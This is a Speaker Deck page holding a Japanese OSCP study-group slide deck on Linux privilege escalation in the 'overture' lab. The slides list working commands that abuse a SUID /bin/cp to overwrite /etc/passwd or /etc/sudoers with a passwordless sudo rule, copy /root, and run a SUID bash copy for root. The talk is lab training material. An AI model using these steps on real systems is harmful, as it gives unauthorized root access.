Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Linuxでの権限昇格 / Privilege Escalation in Linux

Avatar for tkito tkito
March 24, 2023
Technology
0
790

Linuxでの権限昇格 / Privilege Escalation in Linux

2023/03/24に開催されたOSCP勉強会のLT資料(軽量版)です。
https://off-sec-lab.connpass.com/event/276425/
Avatar for tkito

tkito

March 24, 2023
Tweet

More Decks by tkito

See All by tkito
あの頃(2000年頃)のインターネット / The Internet in the early 2000s
Avatar for tkito tkito
1
110
Boot2Rootをやろう / Let's play Boot2Root
Avatar for tkito tkito
0
860
Re: SQLiから始めるRCE生活 / RCE via SQLi
Avatar for tkito tkito
0
280
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
Avatar for tkito tkito
1
2.8k
SOC-IRとOSCP / SOC-IR and OSCP
Avatar for tkito tkito
0
110

Other Decks in Technology

See All in Technology
Claude Code Actionを使ったコード品質改善の取り組み
Avatar for Katsunori Kanda potix2
PRO
4
1.7k
成立するElixirの再束縛(再代入)可という選択
Avatar for kubell kubell_hr
0
950
2025/6/21 日本学術会議公開シンポジウム発表資料
Avatar for Keisuke Fujii keisuke198619
2
480
AWS アーキテクチャ作図入門/aws-architecture-diagram-101
Avatar for Kohei "Max" MATSUSHITA ma2shita
29
9.5k
Agentic Workflowという選択肢を考える
Avatar for takuya kikuchi tkikuchi1002
1
390
20250625 Snowflake Summit 2025活用事例 レポート / Nowcast Snowflake Summit 2025 Case Study Report
Avatar for K.Osawa kkuv
1
220
原則から考える保守しやすいComposable関数設計
Avatar for Mori Atsushi moriatsushi
3
500
OAuth/OpenID Connectで実現するMCPのセキュアなアクセス管理
Avatar for kura kuralab
5
880
Wasm元年
Avatar for asuka askua
0
100
_第3回__AIxIoTビジネス共創ラボ紹介資料_20250617.pdf
Avatar for AIxIoTビジネス共創ラボ iotcomjpadmin
0
140
Microsoft Build 2025 技術/製品動向 for Microsoft Startup Tech Community
Avatar for Toru Makabe torumakabe
1
210
CI/CDとタスク共有で加速するVibe Coding
Avatar for tnbe21 tnbe21
0
230

Featured

See All Featured
KATA
Avatar for Megan Lloyd mclloyd
29
14k
Designing for humans not robots
Avatar for Tammie Lister tammielis
253
25k
Optimising Largest Contentful Paint
Avatar for Harry Roberts csswizardry
37
3.3k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
Avatar for Michelle Schulp Hunt marktimemedia
31
2.4k
Raft: Consensus for Rubyists
Avatar for Patrick Van Stee vanstee
140
7k
The Illustrated Children's Guide to Kubernetes
Avatar for Chris Short chrisshort
48
50k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
Avatar for Dan Newman danielanewman
228
22k
Testing 201, or: Great Expectations
Avatar for Joseph Mastey jmmastey
42
7.5k
Optimizing for Happiness
Avatar for Tom Preston-Werner mojombo
379
70k
Distributed Sagas: A Protocol for Coordinating Microservices
Avatar for Caitie McCaffrey caitiem20
331
22k
A Modern Web Designer's Workflow
Avatar for Chris Coyier chriscoyier
693
190k
How GitHub (no longer) Works
Avatar for Zach Holman holman
314
140k

Transcript

  1. Linuxでの権限昇格 2023/03/24 OSCP勉強会 きとう

  2. 自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり

    2 おしごと • 企業でSOCの中の人とかIRとか Linuxでの権限昇格

  3. おことわり Linuxでの権限昇格 3 OSCP(PEN-200)勉強中の者が学んだ内容を 発表するものです どうかマサカリはおしまいください でも間違いがあったら教えてください

  4. 権限昇格 非特権ユーザーから特権ユーザーになること • 非特権ユーザー • 一般ユーザーのこと • 特権ユーザー • 一般ユーザーができないことをできる高い権限を持ったユーザー

    • Linuxだとroot • WindowsだとAdministratorとかSYSTEM • 今回はLinuxでのお話 Linuxでの権限昇格 4

  5. offsec-1-overtureにおける権限昇格 root権限のユーザを追加 Linuxでの権限昇格 5 /bin/cpに SUIDビット SUIDの立った プログラムの探索 /bin/cpで /etc/passwdを上書き

    root権限を持った ユーザを追加した passwdを用意 追加した ユーザでログイン 昇格!

  6. offsec-1-overtureにおける権限昇格 むずかしくない…? Linuxでの権限昇格 6 /bin/cpに SUIDビット SUIDの立った プログラムの探索 /bin/cpで /etc/passwdを上書き

    root権限を持った ユーザを追加した passwdを用意 追加した ユーザでログイン 昇格! • ここすごい閃きだと思う • /bin/cpじゃなくて別のだったら? パターン整理していくと何か知見が 得られるかも!?

  7. 権限昇格に使われる手法の整理 権限昇格までの手順をパーツに分けてパターンを整理してみる(WIP) Linuxでの権限昇格 7 ここに至るパスを 考えていけばいい

  8. Linuxでの権限昇格 8 ①/bin/cpにSUID ②ファイル書込可 ③/etc/passwdに追加 ④ログイン ⑤昇格完了

  9. offsec-1-overture 別解 攻略の流れ • find / -type f -perm –u=s

    2>/dev/null SUIDビットの立ったプログラムを探索 /bin/cpを確認 • cp /etc/sudoers /tmp/ /etc/sudoersをコピー • cat /tmp/sudoers > /tmp/sudoers2 編集のために自分をownerに • echo “apache ALL=NOPASSWD:ALL” >> /tmp/sudoers2 Pass無しでsudoできる魔法の言葉 • cp /tmp/sudoers2 /etc/sudoers /etc/sudoersに書き戻し • sudo su – sudoでrootに • cat /root/flag.txt フラグゲット Linuxでの権限昇格 9

  10. Linuxでの権限昇格 10

  11. offsec-1-overture 別解(邪道) 攻略の流れ • find / -type f -perm –u=s

    2>/dev/null SUIDビットの立ったプログラムを探索 /bin/cpを確認 • cp -rv /root /tmp/ /rootをごっそりコピー • cat /tmp/root/flag.txt フラグゲット • CTFならいいけどOSCPではダメ Linuxでの権限昇格 11

  12. おまけ SUIDを使って直接root権限を得る方法(overtureの攻略には使えない) • [*rootで*] • cp /bin/bash /tmp/bash bashをコピーして •

    chmod u+s /tmp/bash SUIDを立てる • [*non-rootで*] • /tmp/bash -p euid(effective uid)が0になりrootと同じ権限を得る • でもrootでコマンド実行させられる状況ならreverse shell使った方がいい気が… Linuxでの権限昇格 12

  13. まとめ • 権限昇格へのパスを一発で思いつける人すごいな! • Linuxでの権限昇格までの手順をパーツに分けて整理してみた(WIP) • 取り掛かりポイントが見つかったら権限昇格に向かって辿っていくとパスが出る • overtureの別解紹介 •

    パターン拡充していこう • Windowsでもやってみようか • みなさんのやり方とか工夫とか教えてください Linuxでの権限昇格 13

  14. おしまい きとう @tkito 14